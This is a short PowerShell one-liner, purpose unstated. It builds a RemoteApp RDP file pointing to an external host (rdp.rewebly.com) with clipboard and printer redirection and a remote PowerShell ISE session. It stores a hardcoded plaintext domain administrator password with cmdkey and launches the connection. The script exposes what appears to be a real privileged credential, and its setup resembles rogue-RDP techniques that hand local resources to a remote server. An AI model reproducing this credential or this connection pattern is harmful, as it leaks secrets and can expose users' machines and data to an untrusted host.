$server="rdp.rewebly.com";$user="corp\Administrator";$pass="!Mamoute901901a";$rdp="$env:TEMP\RemoteApp.rdp";@"
redirectclipboard:i:1
redirectprinters:i:1
remoteapplicationmode:i:1
server port:i:3389
full address:s:$server
alternate full address:s:$server
remoteapplicationprogram:s:||PowerShell_ISE
remoteapplicationname:s:Windows PowerShell ISE (x86)
authentication level:i:2
enablecredsspsupport:i:1
"@|Out-File -Encoding ASCII $rdp;cmdkey /generic:TERMSRV/$server /user:$user /pass:$pass;Start-Process mstsc.exe $rdp
